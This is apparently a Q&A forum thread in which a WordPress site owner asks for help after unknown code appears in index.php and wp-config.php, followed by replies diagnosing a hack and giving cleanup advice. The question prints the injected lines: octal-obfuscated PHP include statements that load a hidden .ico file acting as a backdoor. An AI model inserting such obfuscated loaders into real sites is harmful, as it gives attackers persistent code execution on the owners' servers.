# Alien code appears in wordpress installation critical files

Tags: php, html, wordpress, security

From 4 days ago to now some code automatically generated in my website which is operating with wordpress as a CMS.

The code that was generated inside `index.php` file is this:

```
/*12a36*/

@include "\057home\057ippl\145ir/p\165blic\137html\057blog\057wp-i\156clud\145s/ce\162tifi\143ates\057.3b4\141428f\056ico";

/*12a36*/
```

And the code generated inside `wp-config` file is:

```
/*e2db6*/

@include "\057h\157m\145/\151p\160l\145i\162/\160u\142l\151c\137h\164m\154/\167p\055i\156c\154u\144e\163/\122e\161u\145s\164s\057R\145s\160o\156s\145/\0563\1455\065f\070d\062.\151c\157";

/*e2db6*/
```

The website going reports 404 error.
I need advice / help as to how can I fix this problem.

when this code generated inside this files `index.php` and `wp-config` my server automatically deleted the index.php file.

Also as side information - I use i-theme security plugin.

Comment: Your WordPress installation has been infiltrated by malware. This could have been done on several ways. Change your FTP credentials, delete all physical files on your webspace and reinstall the last backup you 've done. Then update your software to the newest released version. Deinstall plugins and themes you don 't use.

Comment: you are being hacked ...

Comment: Maybe your site get hacked. This code you have needs remove manually. Just check wp_upload folder generally WordPress site hacked through this folder. After remove the all this code install WordPress security plugin and check properly.

Answer (score 0):

This simply indicates that your site is hacked, probably from some underrated or obsolete plugins, you have to manually clean your site and update the plugins and the WordPress core.

You can use online scanning sites to ensure the attacks [https://sitecheck.sucuri.net/], also there might be an alien [php] file which will act as a backdoor, verify the files manually.

Answer (score 0):

Your site has been probably been hacked / inflicted with malaware / virus.

The  code points to include path :

```
/home/ippleir/public_html/blog/wp-includes/certificates/.3b4a428f.ico
```

you should clean all the installation(s) that exists on the same server.

Start by removing the included file / directories and then You can follow many directions on the web or an old answer of mine [here on SO](https://stackoverflow.com/a/32492427/1244126)